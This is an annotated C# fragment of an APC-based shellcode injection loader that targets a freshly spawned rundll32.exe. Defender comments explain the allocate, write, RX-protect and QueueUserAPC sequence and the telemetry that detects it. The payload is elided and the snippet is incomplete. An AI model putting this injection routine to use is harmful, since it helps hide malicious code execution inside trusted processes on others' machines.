// Entry point: spawns rundll32.exe and hands the contents of `sc` to it via a
// user-mode APC. The P/Invoke declarations (CreateProcess, VirtualAllocEx,
// WriteProcessMemory, OpenThread, VirtualProtectEx, QueueUserAPC), the
// STARTUPINFO / PROCESS_INFORMATION structs and the MEM_* / PAGE_* constants
// are not on this page; Win32 semantics are assumed where referenced below.
//
// Review notes (defender view):
//  - `sc` is an elided byte array; nothing on this page says what it holds.
//  - `currentThreads` is never declared in this snippet, so it does not
//    compile as shown; treat it as an incomplete fragment.
//  - None of the return values (success, resultPtr, resultBool, sht, ptr) is
//    checked, so any failed step is silent.
//  - The sequence "allocate RW in another process -> write -> change to RX ->
//    queue an APC on one of its threads" is a well-known injection pattern.
//    The cross-process memory write and the RW->RX protection change are the
//    events host telemetry (API hooks, kernel callbacks, memory scanners)
//    typically records, and a freshly spawned rundll32.exe with no command
//    line is itself an anomaly worth alerting on.
static void Main(string[] args) { | |
// Payload bytes (elided on the page).
byte[] sc = { ... }; | |
// Target process path: a Windows system binary.
string processpath = @"C:\Windows\system32\rundll32.exe"; | |
STARTUPINFO si = new STARTUPINFO(); | |
PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); | |
// Child is created without a window but NOT suspended, so its threads are
// already running when the APC is queued below. `success` is never checked.
bool success = CreateProcess(processpath, null, | |
IntPtr.Zero, IntPtr.Zero, false, | |
ProcessCreationFlags.CREATE_NO_WINDOW, | |
IntPtr.Zero, null, ref si, out pi); | |
// Allocate a writable (not yet executable) region in the child.
// resultPtr is never null-checked.
IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, sc.Length, MEM_COMMIT, PAGE_READWRITE); | |
IntPtr bytesWritten = IntPtr.Zero; | |
// Cross-process write of the payload; bytesWritten is never compared to sc.Length.
bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, sc, sc.Length, out bytesWritten); | |
// targetProc is obtained but never used afterwards.
Process targetProc = Process.GetProcessById((int)pi.dwProcessId); | |
// `currentThreads` is undefined in this snippet (see header note).
// THREAD_SET_CONTEXT is the access right QueueUserAPC requires on the handle.
IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, currentThreads[0].Id); | |
uint oldProtect = 0; | |
// RW -> RX transition: the point at which the written bytes become executable.
resultBool = VirtualProtectEx(pi.hProcess, resultPtr, sc.Length, PAGE_EXECUTE_READ, out oldProtect); | |
// Queue the region's start address as a user-mode APC routine on the opened
// thread. Per the Win32 contract a user-mode APC runs only when that thread
// enters an alertable state; this snippet does nothing to influence that.
IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero); | |
} |